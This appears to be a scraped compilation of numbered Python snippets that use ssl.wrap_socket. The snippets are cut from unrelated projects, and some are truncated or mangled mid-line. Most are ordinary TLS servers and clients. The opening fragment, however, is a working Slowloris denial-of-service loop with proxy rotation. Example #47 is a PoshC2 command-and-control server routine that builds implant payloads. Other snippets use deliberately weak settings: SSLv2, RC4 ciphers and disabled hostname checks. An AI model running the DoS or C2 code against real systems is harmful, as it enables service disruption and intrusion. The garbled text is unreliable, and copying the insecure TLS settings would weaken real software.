            s.send(("Connection:keep-alive").encode("utf-8"))
            socket_list.append(s)
            sys.stdout.write("[*] Running Slow Attack || Connections: " +
                             str(len(socket_list)) + "\r")
            sys.stdout.flush()
        except:
            s.close()
            proxy = random.choice(proxies).strip().split(
                ":")  #Only change proxy when error, increase the performance
            if socks_type == 4:
                socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS4, str(proxy[0]),
                                      int(proxy[1]), True)
            if socks_type == 5:
                socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, str(proxy[0]),
                                      int(proxy[1]), True)
            sys.stdout.write("[*] Running Slow Attack || Connections: " +
                             str(len(socket_list)) + "\r")
            sys.stdout.flush()
    while True:
        for s in list(socket_list):
            try:
                s.send("X-a: {}\r\n".format(random.randint(
                    1, 5000)).encode("utf-8"))
                sys.stdout.write("[*] Running Slow Attack || Connections: " +
                                 str(len(socket_list)) + "\r")
                sys.stdout.flush()
            except:
                s.close()
                socket_list.remove(s)
                sys.stdout.write("[*] Running Slow Attack || Connections: " +
                                 str(len(socket_list)) + "\r")
                sys.stdout.flush()
        proxy = random.choice(proxies).strip().split(":")
        if socks_type == 4:
            socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS4, str(proxy[0]),
                                  int(proxy[1]), True)
        if socks_type == 5:
            socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, str(proxy[0]),
                                  int(proxy[1]), True)
        for _ in range(conn - len(socket_list)):
            try:
                s.settimeout(1)
                s.connect((str(ip), int(port)))
                if str(port) == '443':
                    s = ssl.wrap_socket(s)
                s.send("GET /?{} HTTP/1.1\r\n".format(random.randint(
                    0, 2000)).encode("utf-8"))  # Slowloris format header
                s.send("User-Agent: {}\r\n".format(
                    random.choice(useragents)).encode("utf-8"))
                s.send("{}\r\n".format(
                    "Accept-language: en-US,en,q=0.5").encode("utf-8"))
                s.send(("Connection:keep-alive").encode("utf-8"))
                socket_list.append(s)
                sys.stdout.write("[*] Running Slow Attack || Connections: " +
                                 str(len(socket_list)) + "\r")
                sys.stdout.flush()
            except:
                proxy = random.choice(proxies).strip().split(":")
                if socks_type == 4:
                    socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS4,
                                          str(proxy[0]), int(proxy[1]), True)
                if socks_type == 5:
                    socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5,
                                          str(proxy[0]), int(proxy[1]), True)
                sys.stdout.write("[*] Running Slow Attack || Connections: " +
                                 str(len(socket_list)) + "\r")
                sys.stdout.flush()
                pass
Example #33
0
class PatchedContext:
    def __init__(self, conn):
        conn._check_hostname = False
        conn._context.check_hostname = False
        self.ctx = conn._context

    def __getattr__(self, attr):
        if attr == 'wrap_socket':
            return lambda sock, server_hostname: self.ctx.wrap_socket(sock)
        return getattr(self.ctx, attr)


if __name__ == '__main__':
    basic_auth, proxy, port = get_proxy()
    req = 'GET {url} HTTP/1.0\nProxy-Authorization: BASIC {basic_auth}\n\n'.format(
        url='http://httpbin.org/ip', basic_auth=basic_auth)
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock = ssl.wrap_socket(sock)
    sock.connect((proxy, port))
    sock.send(req.encode('ascii'))
    print(sock.recv(1024))
    sock.close()

    # or with ugly monkey patch
    conn = http.client.HTTPSConnection(proxy, port)
    conn._context = PatchedContext(conn)
    conn.request("GET",
                 "http://httpbin.org/ip",
                 headers={"Proxy-Authorization": "BASIC " + basic_auth})
    print(conn.getresponse().read())
Example #34
0
#allow less secure apps
import ssl
import getpass
import base64  #base64 encoding technique
from socket import *

helloCommand = 'HELO localhost\r\n'
endmsg = "\r\n.\r\n"
mailserver = 'smtp.gmail.com'
clientSocket = socket(AF_INET, SOCK_STREAM)

clientSocket = ssl.wrap_socket(
    clientSocket,  #we are creating a secure socket using either ssl or tls     
    ssl_version=ssl.PROTOCOL_SSLv23,
    ciphers="HIGH:-aNULL:-eNULL:-PSK:RC4-SHA:RC4-MD5",
    cert_reqs=ssl.CERT_REQUIRED)

clientSocket.connect((mailserver, 465))
recvconnect = clientSocket.recv(1024)
print recvconnect

if recvconnect[:3] != '220':
    print '220 reply not received from server.'

#Send hellocommand and print server response
print "Hello Server!"
clientSocket.send(helloCommand)
recvhelo = clientSocket.recv(1024)
print recvhelo
if recvhelo[:3] != '250':
    print '250 reply not received from server.'
Example #35
0
import BaseHTTPServer, SimpleHTTPServer
import ssl

httpd = BaseHTTPServer.HTTPServer(('localhost', 4443),
                                  SimpleHTTPServer.SimpleHTTPRequestHandler)
httpd.socket = ssl.wrap_socket(httpd.socket,
                               keyfile='../../../../https_test/key.pem',
                               certfile='../../../../https_test/cert.pem',
                               server_side=True)
httpd.serve_forever()
Example #36
0
recv1 = clientSocket.recv(1024).decode()
print(recv1)
if recv1[:3] != '250':
    print('250 reply not received from server.')

# Send MAIL FROM command and print server response.

command = 'STARTTLS\r\n'
clientSocket.send(bytes(command, 'utf-8'))
recv11 = clientSocket.recv(1024).decode()

if recv11[:3] != '220':
    print('220 reply not received from server.')

#wrappedSocket = ssl.wrap_socket(clientSocket)  #, ssl_version=ssl.PROTOCOL_TLSv1, ciphers="ADH-AES256-SHA")
wrappedSocket = ssl.wrap_socket(clientSocket)

#username and password

username = input("Enter username: "******"Enter password: "******"AUTH LOGIN\r\n"
wrappedSocket.send(bytes(authMsg, 'utf-8'))
recv_auth = wrappedSocket.recv(1024)
print(recv_auth.decode())

wrappedSocket.send(base64.b64encode(username) + '\r\n'.encode('utf-8'))
recv111 = wrappedSocket.recv(1024).decode()

print(recv111)
        try:
            with open(ARGS.enroll_secret, "r") as fh:
                ENROLL_SECRET = fh.read().strip()
        except IOError as e:
            print("Cannot read --enroll_secret: %s" % str(e))
            exit(1)

    if not ARGS.persist:
        signal.signal(signal.SIGALRM, handler)
        signal.alarm(ARGS.timeout)

    httpd = HTTPServer(('localhost', ARGS.port), RealSimpleHandler)
    if ARGS.tls:
        if 'SSLContext' in vars(ssl):
            ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
            ctx.load_cert_chain(ARGS.cert, keyfile=ARGS.key)
            ctx.load_verify_locations(capath=ARGS.ca)
            ctx.options ^= ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3
            httpd.socket = ctx.wrap_socket(httpd.socket, server_side=True)
        else:
            httpd.socket = ssl.wrap_socket(httpd.socket,
                                           ca_certs=ARGS.ca,
                                           ssl_version=ssl.PROTOCOL_SSLv23,
                                           certfile=ARGS.cert,
                                           keyfile=ARGS.key,
                                           server_side=True)
        debug("Starting TLS/HTTPS server on TCP port: %d" % ARGS.port)
    else:
        debug("Starting HTTP server on TCP port: %d" % ARGS.port)
    httpd.serve_forever()
Example #38
0
    def http_request(self, req):
        tmp_ca_cert_path, to_add_ca_cert_path, paths_checked = self.get_ca_certs(
        )
        https_proxy = os.environ.get('https_proxy')
        context = None
        if HAS_SSLCONTEXT or HAS_URLLIB3_PYOPENSSLCONTEXT:
            context = self._make_context(to_add_ca_cert_path)

        # Detect if 'no_proxy' environment variable is set and if our URL is included
        use_proxy = self.detect_no_proxy(req.get_full_url())

        if not use_proxy:
            # ignore proxy settings for this host request
            return req

        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            if https_proxy:
                proxy_parts = generic_urlparse(urlparse(https_proxy))
                port = proxy_parts.get('port') or 443
                s.connect((proxy_parts.get('hostname'), port))
                if proxy_parts.get('scheme') == 'http':
                    s.sendall(self.CONNECT_COMMAND %
                              (self.hostname, self.port))
                    if proxy_parts.get('username'):
                        credentials = "%s:%s" % (proxy_parts.get(
                            'username', ''), proxy_parts.get('password', ''))
                        s.sendall(
                            b('Proxy-Authorization: Basic %s\r\n') %
                            base64.b64encode(
                                to_bytes(
                                    credentials,
                                    errors='surrogate_or_strict')).strip())
                    s.sendall(b('\r\n'))
                    connect_result = b("")
                    while connect_result.find(b("\r\n\r\n")) <= 0:
                        connect_result += s.recv(4096)
                        # 128 kilobytes of headers should be enough for everyone.
                        if len(connect_result) > 131072:
                            raise ProxyError(
                                'Proxy sent too verbose headers. Only 128KiB allowed.'
                            )
                    self.validate_proxy_response(connect_result)
                    if context:
                        ssl_s = context.wrap_socket(
                            s, server_hostname=self.hostname)
                    elif HAS_URLLIB3_SSL_WRAP_SOCKET:
                        ssl_s = ssl_wrap_socket(s,
                                                ca_certs=tmp_ca_cert_path,
                                                cert_reqs=ssl.CERT_REQUIRED,
                                                ssl_version=PROTOCOL,
                                                server_hostname=self.hostname)
                    else:
                        ssl_s = ssl.wrap_socket(s,
                                                ca_certs=tmp_ca_cert_path,
                                                cert_reqs=ssl.CERT_REQUIRED,
                                                ssl_version=PROTOCOL)
                        match_hostname(ssl_s.getpeercert(), self.hostname)
                else:
                    raise ProxyError(
                        'Unsupported proxy scheme: %s. Currently ansible only supports HTTP proxies.'
                        % proxy_parts.get('scheme'))
            else:
                s.connect((self.hostname, self.port))
                if context:
                    ssl_s = context.wrap_socket(s,
                                                server_hostname=self.hostname)
                elif HAS_URLLIB3_SSL_WRAP_SOCKET:
                    ssl_s = ssl_wrap_socket(s,
                                            ca_certs=tmp_ca_cert_path,
                                            cert_reqs=ssl.CERT_REQUIRED,
                                            ssl_version=PROTOCOL,
                                            server_hostname=self.hostname)
                else:
                    ssl_s = ssl.wrap_socket(s,
                                            ca_certs=tmp_ca_cert_path,
                                            cert_reqs=ssl.CERT_REQUIRED,
                                            ssl_version=PROTOCOL)
                    match_hostname(ssl_s.getpeercert(), self.hostname)
            # close the ssl connection
            # ssl_s.unwrap()
            s.close()
        except (ssl.SSLError, CertificateError):
            e = get_exception()
            build_ssl_validation_error(self.hostname, self.port, paths_checked,
                                       e)
        except socket.error:
            e = get_exception()
            raise ConnectionError('Failed to connect to %s at port %s: %s' %
                                  (self.hostname, self.port, to_native(e)))

        try:
            # cleanup the temp file created, don't worry
            # if it fails for some reason
            os.remove(tmp_ca_cert_path)
        except:
            pass

        try:
            # cleanup the temp file created, don't worry
            # if it fails for some reason
            if to_add_ca_cert_path:
                os.remove(to_add_ca_cert_path)
        except:
            pass

        return req
Example #39
0
BAYTAlVTMRMwEQYDVQQIEwpDYWxpZm9ybmlhMREwDwYDVQQHEwhTYW4gSm9zZTEY
MBYGA1UEChMPTGFtc29mdHdhcmUgTExDMRQwEgYDVQQDEwtBbkxhbVNlcnZlcjAe
Fw0xODA2MDYxNzAxMzNaFw0yODA2MDMxNzAxMzNaMGUxCzAJBgNVBAYTAlVTMRMw
EQYDVQQIEwpDYWxpZm9ybmlhMREwDwYDVQQHEwhTYW4gSm9zZTEYMBYGA1UEChMP
TGFtc29mdHdhcmUgTExDMRQwEgYDVQQDEwtBbkxhbVNlcnZlcjCBnzANBgkqhkiG
9w0BAQEFAAOBjQAwgYkCgYEAs4wLtICcGA2Cd6jk3UUIOyDliJxr3n8psZjHNkCf
3QH6SaGA3pHKa4h4H8ovnC5l0TECjyeGGmWuaEfJcz4PyWBLbvm/YN1vHxhNGkPR
6aL2e3O4/BN595TdLcyPBliaoUkiBmgebEFOo+7sYguI4Pqlob7okdKKkrVLJxFS
6OUCAwEAAaOByjCBxzAdBgNVHQ4EFgQUss6I1rt+6tkkP6PO6uXuuXw/w0kwgZcG
A1UdIwSBjzCBjIAUss6I1rt+6tkkP6PO6uXuuXw/w0mhaaRnMGUxCzAJBgNVBAYT
AlVTMRMwEQYDVQQIEwpDYWxpZm9ybmlhMREwDwYDVQQHEwhTYW4gSm9zZTEYMBYG
A1UEChMPTGFtc29mdHdhcmUgTExDMRQwEgYDVQQDEwtBbkxhbVNlcnZlcoIJAP+q
BfdY9YykMAwGA1UdEwQFMAMBAf8wDQYJKoZIhvcNAQEFBQADgYEAIPfvzVsLD80f
V32+wMrqeygw1SDLNTX0G1132QjD2T4lJqdcTk7wBRfrasvP0SQhVXKXhe0rVrf3
hzj0fRtlETe5Eo9n5VDv8SrQh/Jn1zTq8EEVa86/JF8n049pkZ5E1+OeQnL96qxe
FBJVkCRuABu1gYD8P87S/rB0ioO40G8=
-----END CERTIFICATE-----


"""

import http.server
import ssl

httpd = http.server.HTTPServer(('127.0.0.1', 4443),
                               http.server.SimpleHTTPRequestHandler)
httpd.socket = ssl.wrap_socket(httpd.socket,
                               certfile='server.pem',
                               server_side=True)
print("started https ...on port 4443")
httpd.serve_forever()
Example #40
0
    def do_POST(self):
        content_len = int(self.headers.get('content-length', 0))
        post_body = self.rfile.read(content_len).decode()
        request = post_body[1:post_body.find(' ')]
        self.path = self.path + '&REQUEST_BODY=' + \
            post_body.replace('&amp;', '') + '&REQUEST=' + request
        return self.do_GET()


if __name__ == '__main__':
    server = HTTPServer((QGIS_SERVER_HOST, QGIS_SERVER_PORT), Handler)
    if https:
        server.socket = ssl.wrap_socket(server.socket,
                                        certfile=QGIS_SERVER_PKI_CERTIFICATE,
                                        keyfile=QGIS_SERVER_PKI_KEY,
                                        ca_certs=QGIS_SERVER_PKI_AUTHORITY,
                                        cert_reqs=ssl.CERT_REQUIRED,
                                        server_side=True,
                                        ssl_version=ssl.PROTOCOL_TLSv1)
    print('Starting server on %s://%s:%s, use <Ctrl-C> to stop' %
          ('https' if https else 'http', QGIS_SERVER_HOST, server.server_port),
          flush=True)

    def signal_handler(signal, frame):
        global qgs_app
        print("\nExiting QGIS...")
        qgs_app.exitQgis()
        sys.exit(0)

    signal.signal(signal.SIGINT, signal_handler)
    server.serve_forever()
Example #41
0
 def _wrap_ssl(self, conn):
     if self._debug is not None:
         self._debug('%s: Wrapping socket with SSL' % (self, ))
     # FIXME: We're losing the SNI stuff here, which is super lame.
     return ssl.wrap_socket(conn, None, None, ssl_version=self.SSL_VERSION)
Example #42
0
                        required=True,
                        help=('The path to the Redfish Mockup files in '
                              'the filesystem'))
    parser.add_argument('-c',
                        '--ssl-certificate',
                        type=str,
                        help='SSL certificate to use for HTTPS')
    parser.add_argument('-k',
                        '--ssl-key',
                        type=str,
                        help='SSL key to use for HTTPS')
    return parser.parse_args()


if __name__ == '__main__':
    args = parse_args()
    if not os.path.exists(args.mockup_files):
        print('Mockup files %s not found' % args.mockup_files)
        sys.exit(1)

    REDFISH_MOCKUP_FILES = os.path.realpath(args.mockup_files)
    httpd = http_server.HTTPServer(('', args.port), RequestHandler)

    if args.ssl_certificate and args.ssl_key:
        httpd.socket = ssl.wrap_socket(httpd.socket,
                                       keyfile=args.ssl_key,
                                       certfile=args.ssl_certificate,
                                       server_side=True)

    httpd.serve_forever()
Example #43
0
import socket
import sys
import ssl

KEY = '/home/pi/project/SSL_Key_Cert/server.key'
CERT = '/home/pi/project/SSL_Key_Cert/server.crt'

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  # Creating Socket
server_address = ('localhost', 10006)
sock.bind(server_address)
sock.listen(10)
sock_ssl = ssl.wrap_socket(sock, keyfile=KEY, certfile=CERT, server_side=True)
print('SSL socket created')
print("Server is listening for clients ...")

while True:
    conn, addr = sock_ssl.accept()  # Establish connection with client.
    print 'Got connection from', addr
    clientuuid = conn.recv(21)
    print("Client UUID is  = %s", clientuuid)
    vidrecfilename = clientuuid + '_videorectest.h264'
    with open('/home/pi/project/WSvidrecv//' + vidrecfilename, 'wb+') as f:
        while True:
            print("Recieving Data ....")
            data = conn.recv(3072)
            if not data:
                break
            f.write(data)
f.close()
print("Successfully Received Video Recording")
conn.close()
                             'AMP-Access-Control-Allow-Source-Origin')
            self.send_header('AMP-Access-Control-Allow-Source-Origin',
                             'http://localhost:4000')
            self.end_headers()

            # get useful fields from the request
            fields = cgi.parse_multipart(self.rfile, pdict)
            first_name = fields.get('First_Name')[0].decode()
            last_name = fields.get('Last_Name')[0].decode()
            email_address = fields.get('Email_Address')[0].decode()
            telephone_number = fields.get('Telephone_Number')[0].decode()
            json_response = json.dumps({
                'email_address': email_address,
                'first_name': first_name,
                'last_name': last_name
            })
            self.wfile.write(bytes(json_response, 'utf-8'))
            print(first_name)
            mailClient.send(first_name, last_name, email_address,
                            telephone_number)


if __name__ == '__main__':
    port = int(os.environ.get('PORT', 8000))
    server_address = ('', port)
    httpd = ThreadHTTPServer(server_address, EmailResponder)
    httpd.socket = ssl.wrap_socket(httpd.socket,
                                   certfile='/Users/dan/.certs/server.pem',
                                   server_side=True)
    httpd.serve_forever()
            logger.error('Bad Path')

try:
    CERTFILE = LOCALPATH + "certs/" + os.environ.get('CERTPATH') + "fullchain.pem"
    KEYFILE = LOCALPATH + "certs/" + os.environ.get('CERTPATH') + "privkey.pem"

    if not os.path.isfile(CERTFILE):
        logger.error("Certfile not found: %s", sys.exc_info()[0])
        sys.exit(0)

    if not os.path.isfile(KEYFILE):
        logger.error("Keyfile not found: %s", sys.exc_info()[0])
        sys.exit(0)

    httpd = HTTPServer(('', 8888), SimpleHTTPRequestHandler)
    httpd.socket = ssl.wrap_socket (httpd.socket, keyfile=KEYFILE, certfile=CERTFILE, server_side=True)
    sa = httpd.socket.getsockname()

    write_tz()

    logger.info("Python REST Server")
    logger.info("Serving HTTPS on port %d", sa[1])

    ##############################################################################
    # Start garage door thread
    ##############################################################################
    logger.info("Listening for garage commands")
    messageListenerThread = threading.Thread(target=garage_listener)
    messageListenerThread.setDaemon(True)
    messageListenerThread.start()
Example #46
0
 def _get_socket(self, host, port, timeout):
     if self.debuglevel > 0: print>>stderr, 'connect:', (host, port)
     new_socket = socket.create_connection((host, port), timeout)
     new_socket = ssl.wrap_socket(new_socket, self.keyfile, self.certfile)
     self.file = SSLFakeFile(new_socket)
     return new_socket
Example #47
0
def main(args):
    httpd = ThreadedHTTPServer((BindIP, BindPort), MyHandler)

    try:
        if os.name == 'nt':
            os.system('cls')
        else:
            os.system('clear')
    except Exception:
        print("cls")
    print(chr(27) + "[2J")
    print(Colours.GREEN + logopic)
    print(Colours.END + "")

    if os.path.isfile(Database):
        print(("Using existing project: %s" % PoshProjectDirectory) +
              Colours.GREEN)
        database_connect()
        C2 = get_c2server_all()
        if ((C2[1] == PayloadCommsHost) and (C2[3] == DomainFrontHeader)):
            qstart = "%squickstart.txt" % (PoshProjectDirectory)
            if os.path.exists(qstart):
                with open(qstart, 'r') as f:
                    print(f.read())
        else:
            print("Error: different IP so regenerating payloads")
            if os.path.exists("%spayloads_old" % PoshProjectDirectory):
                import shutil
                shutil.rmtree("%spayloads_old" % PoshProjectDirectory)
            os.rename(PayloadsDirectory, "%s:_old" % PoshProjectDirectory)
            os.makedirs(PayloadsDirectory)
            C2 = get_c2server_all()
            newPayload = Payloads(C2[5], C2[2], PayloadCommsHost,
                                  DomainFrontHeader, C2[8], C2[12], C2[13],
                                  C2[11], "", "", C2[19], C2[20], C2[21],
                                  get_newimplanturl(), PayloadsDirectory)
            new_urldetails("updated_host", PayloadCommsHost, C2[3], "", "", "",
                           "")
            update_item("PayloadCommsHost", "C2Server", PayloadCommsHost)
            update_item("QuickCommand", "C2Server", QuickCommand)
            update_item("DomainFrontHeader", "C2Server", DomainFrontHeader)
            newPayload.CreateRaw()
            newPayload.CreateDlls()
            newPayload.CreateShellcode()
            newPayload.CreateSCT()
            newPayload.CreateHTA()
            newPayload.CreateCS()
            newPayload.CreateMacro()
            newPayload.CreateEXE()
            newPayload.CreateMsbuild()
            newPayload.CreatePython()
            newPayload.WriteQuickstart(PoshProjectDirectory + 'quickstart.txt')

    else:
        print("Initializing new project folder and database" + Colours.GREEN)
        print("")
        directory = os.path.dirname(PoshProjectDirectory)
        if not os.path.exists(PoshProjectDirectory):
            os.makedirs(PoshProjectDirectory)
        if not os.path.exists(DownloadsDirectory):
            os.makedirs(DownloadsDirectory)
        if not os.path.exists(ReportsDirectory): os.makedirs(ReportsDirectory)
        if not os.path.exists(PayloadsDirectory):
            os.makedirs(PayloadsDirectory)
        initializedb()
        if not validate_sleep_time(DefaultSleep):
            print(Colours.RED)
            print(
                "Invalid DefaultSleep in config, please specify a time such as 50s, 10m or 1h"
            )
            print(Colours.GREEN)
            sys.exit(1)
        setupserver(PayloadCommsHost,
                    gen_key().decode("utf-8"), DomainFrontHeader, DefaultSleep,
                    KillDate, HTTPResponse, PoshProjectDirectory,
                    PayloadCommsPort, QuickCommand, DownloadURI, "", "", "",
                    Sounds, ClockworkSMS_APIKEY, ClockworkSMS_MobileNumbers,
                    URLS, SocksURLS, Insecure, UserAgent, Referrer,
                    Pushover_APIToken, Pushover_APIUser, EnableNotifications)
        rewriteFile = "%s/rewrite-rules.txt" % directory
        print("Creating Rewrite Rules in: " + rewriteFile)
        print("")
        rewriteHeader = [
            "RewriteEngine On", "SSLProxyEngine On", "SSLProxyCheckPeerCN Off",
            "SSLProxyVerify none", "SSLProxyCheckPeerName off",
            "SSLProxyCheckPeerExpire off",
            "# Change IPs to point at C2 infrastructure below",
            "Define PoshC2 10.0.0.1", "Define SharpSocks 10.0.0.1"
        ]
        rewriteFileContents = rewriteHeader + urlConfig.fetchRewriteRules(
        ) + urlConfig.fetchSocksRewriteRules()
        with open(rewriteFile, 'w') as outFile:
            for line in rewriteFileContents:
                outFile.write(line)
                outFile.write('\n')
            outFile.close()

        C2 = get_c2server_all()
        newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12],
                              C2[13], C2[11], "", "", C2[19], C2[20], C2[21],
                              get_newimplanturl(), PayloadsDirectory)

        new_urldetails("default", C2[1], C2[3], "", "", "", "")
        newPayload.CreateRaw()
        newPayload.CreateDlls()
        newPayload.CreateShellcode()
        newPayload.CreateSCT()
        newPayload.CreateHTA()
        newPayload.CreateCS()
        newPayload.CreateMacro()
        newPayload.CreateEXE()
        newPayload.CreateMsbuild()

        create_self_signed_cert(PoshProjectDirectory)
        newPayload.CreatePython()
        newPayload.WriteQuickstart(directory + '/quickstart.txt')

    print("")
    print("CONNECT URL: " + select_item("PayloadCommsHost", "C2Server") +
          get_newimplanturl() + Colours.GREEN)
    print("WEBSERVER Log: %swebserver.log" % PoshProjectDirectory)
    global KEY
    KEY = get_baseenckey()
    print("")
    print(time.asctime() + " PoshC2 Server Started - %s:%s" %
          (BindIP, BindPort))
    from datetime import date, datetime
    killdate = datetime.strptime(C2[5], '%d/%m/%Y').date()
    datedifference = number_of_days(date.today(), killdate)
    if datedifference < 8:
        print(Colours.RED + ("\nKill Date is - %s - expires in %s days" %
                             (C2[5], datedifference)))
    else:
        print(Colours.GREEN + ("\nKill Date is - %s - expires in %s days" %
                               (C2[5], datedifference)))
    print(Colours.END)

    protocol = urlparse(PayloadCommsHost).scheme

    if protocol == 'https':
        if (os.path.isfile(
                "%sposh.crt" % PoshProjectDirectory)) and (os.path.isfile(
                    "%sposh.key" % PoshProjectDirectory)):
            try:
                httpd.socket = ssl.wrap_socket(
                    httpd.socket,
                    keyfile="%sposh.key" % PoshProjectDirectory,
                    certfile="%sposh.crt" % PoshProjectDirectory,
                    server_side=True,
                    ssl_version=ssl.PROTOCOL_TLS)
            except Exception:
                httpd.socket = ssl.wrap_socket(
                    httpd.socket,
                    keyfile="%sposh.key" % PoshProjectDirectory,
                    certfile="%sposh.crt" % PoshProjectDirectory,
                    server_side=True,
                    ssl_version=ssl.PROTOCOL_TLSv1)
        else:
            raise ValueError("Cannot find the certificate files")

    c2_message_thread = threading.Thread(target=log_c2_messages, daemon=True)
    c2_message_thread.start()

    try:
        httpd.serve_forever()
    except (KeyboardInterrupt, EOFError):
        httpd.server_close()
        print(time.asctime() + " PoshC2 Server Stopped - %s:%s" %
              (BindIP, BindPort))
        sys.exit(0)
Example #48
0
 def wrap_socket(self, sock, **kwargs):
     return ssl.wrap_socket(sock, keyfile=self._keyfile,
                            certfile=self._certfile,
                            ssl_version=self._protocol, **kwargs)
Example #49
0
 def connect(self, host):
     self.sock.connect(host)
     self.sock = ssl.wrap_socket(self.sock, do_handshake_on_connect=False)
     self.stream = iostream.SSLIOStream(self.sock)
Example #50
0
def main(argv=None):
    if argv is None:
        argv = sys.argv

    title = 'VMAccessServer v0.1.1'
    os.system("title " + title)

    sys.stdout = Logger()

    host = None
    port = None
    keyfile = None
    certfile = None

    with open('config.cfg', 'r') as cfg: 
        for line in cfg:
            if line.startswith('host'):
                host = line.split()[2]
            elif line.startswith('port'):
                port = int(line.split()[2])
            elif line.startswith('keyfile'):
                keyfile = line.split('"')[1]
            elif line.startswith('certfile'):
                certfile = line.split('"')[1]
            if (host is not None and port is not None
              and keyfile is not None and certfile is not None):
                break

    if host is None:
        print('Error occurred: information about host is not found!')
        return 1
    elif port is None:
        print('Error occurred: information about port is not found!')
        return 1
    elif keyfile is None:
        print('Error occurred: information about SSL key is not found!')
        return 1
    elif certfile is None:
        print('Error occurred: information about SSL certfile is not found!')
        return 1

    raw_server = None
    server = None

    try:
        raw_server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    except OSError as e:
        print('Error occurred: failed to set up socket!\r\n%s' %(e))
        return 1

    try:
        server = ssl.wrap_socket(
          raw_server,
          keyfile=keyfile,
          certfile=certfile,
          server_side=True,
          ssl_version=ssl.PROTOCOL_TLSv1_2,
          ciphers='AES256-SHA256')
    except SSLError as e:
        print('Error occurred: failed to set up SSL!\r\n%s' %(e))
        return 1

    simultaneous_sessions = 10
    max_msg_size = 4096

    try:
        server.bind((host,port))
        server.listen(simultaneous_sessions)
    except OSError as e:
        print('Error occurred: failed to set up listening port!\r\n%s' %(e))
        return 1

    input = [server,]
    pool = PowershellSessionPool()
    running = True
    
    try:
        while running:
            try:
                inputready, outputready, exceptready =\
                  select.select(input, [], [], 1)
            except OSError:
                print('Error occurred: select from active sockets crushed!'
                  '\r\n%s' %(e))
                for sock in input:
                    close(sock)
                return 1
        
            for s in inputready:
                if s == server:
                    client, address = server.accept()
                    input.append(client)
                    pool.append(client)
                    print ('%sNew client added%s'
                      %(time.strftime("%y.%m.%d/%H:%M:%S - "), str(address)))
                else:
                    session = pool.find_session(s)
                    data = u_recv(s, max_msg_size)
                    if data:
                        if session.status():
                            answer = session.manage(data)
                            u_send(s, answer)
                        else:
                            answer = session.authentificate(data)
                            if answer is not None:
                                print ('%sAuthentification successful for '
                                  'token #%s'
                                  %(time.strftime("%y.%m.%d/%H:%M:%S - "),
                                  str(data)))
                                u_send(s, answer)
                            else:
                                print ('%sAuthentification failed for token '
                                  '#%s'
                                  %(time.strftime("%y.%m.%d/%H:%M:%S - "),
                                  str(data)))
                                pool.remove(s)
                                input.remove(s)
                    else:
                        print ('%sToken #%s disconnected'
                          %(time.strftime("%y.%m.%d/%H:%M:%S - "),
                          session.token()))
                        pool.remove(s)
                        input.remove(s)
                        
    except KeyboardInterrupt as e:
        print('Keyboard interrupt detected, stopping the server...\n%s' %(e))
    finally:
        for s in input:
            s.close()
        return 0
Example #51
0
def open_socket(host, port):
    sock = ssl.wrap_socket(socket(AF_INET, SOCK_DGRAM))
    setattr(sock, "ssl_version", sslconnection.PROTOCOL_DTLSv1)
    sock.connect((host, port))
    return sock
import hashlib
import binascii
import ssl
import socket

# Using the deprecated ssl.wrap_socket method
ssl.wrap_socket(socket.socket(), ssl_version=ssl.PROTOCOL_SSLv2)

# Using SSLContext
context = ssl.SSLContext(ssl_version=ssl.PROTOCOL_SSLv3)

# Using pyOpenSSL
from pyOpenSSL import SSL

context = SSL.Context(SSL.TLSv1_METHOD)

CONFIG_FILE = 'passwords.json'


def redirect(args):
    pass


def load_from_config(pass_key, config_file):
    pass


def test_credentials_severity_error_lgtm(request):
    password = request.GET["password"]
    # BAD:
    # Authentication made by comparison to string literal
Example #53
0
        def connect(self):
            "Connect to a host on a given (SSL) port."

            sock = socket.create_connection((self.host, self.port),
                                            self.timeout)
            self.sock = ssl.wrap_socket(sock, self.key_file, self.cert_file)
Example #54
0
 def connect():
     connector.connect(('127.0.0.1', port))
     ssl.wrap_socket(connector)
Example #55
0
 def connect():
     connector.connect(('127.0.0.1', port))
     s = ssl.wrap_socket(connector)
     s.sendall(b'test_serverssl_makefile2')
     s.close()
     connector.close()
def connect_to_datadog(host, port):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s = ssl.wrap_socket(s)
    s.connect((host, port))
    return s
Example #57
0
 def getssldomain(self, threadname, ip):
     time_begin = time.time()
     s = None
     c = None
     haserror = 1
     timeout = 0
     domain = None
     gwsname = ""
     ssl_orgname = ""
     try:
         s = socket.socket()
         s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
         if g_useOpenSSL:
             my_ssl_wrap.initsslcxt()
             s.settimeout(g_conntimeout)
             s.connect((ip, 443))
             c = OpenSSL.SSL.Connection(my_ssl_wrap.ssl_cxt, s)
             c.set_connect_state()
             s.setblocking(0)
             while True:
                 try:
                     c.do_handshake()
                     break
                 except SSLError:
                     infds, outfds, errfds = select.select([
                         s,
                     ], [], [], g_handshaketimeout)
                     if len(infds) == 0:
                         raise SSLError("do_handshake timed out")
                     else:
                         costtime = int(time.time() - time_begin)
                         if costtime > g_handshaketimeout:
                             raise SSLError("do_handshake timed out")
                         else:
                             pass
                 except OpenSSL.SSL.SysCallError as e:
                     raise SSLError(e.args)
             time_end = time.time()
             cert = c.get_peer_certificate()
             costtime = int(time_end * 1000 - time_begin * 1000)
             for subject in cert.get_subject().get_components():
                 if subject[0] == "CN":
                     domain = subject[1]
                     haserror = 0
                 elif subject[0] == "O":
                     ssl_orgname = subject[1]
             if domain is None:
                 PRINT("%s can not get CN: %s " %
                       (ip, cert.get_subject().get_components()))
             if ssl_orgname == "" or ssl_orgname not in g_organizationName:
                 return domain, costtime, timeout, gwsname, ssl_orgname
             #尝试发送http请求,获取回应头部的Server字段
             #if domain is None or isgoolgledomain(domain) == 2:
             if True:
                 cur_time = time.time()
                 gwsname = self.getgooglesvrname(c, s, ip)
                 time_end = time.time()
                 costtime += int(time_end * 1000 - cur_time * 1000)
                 if domain is None and len(gwsname) > 0:
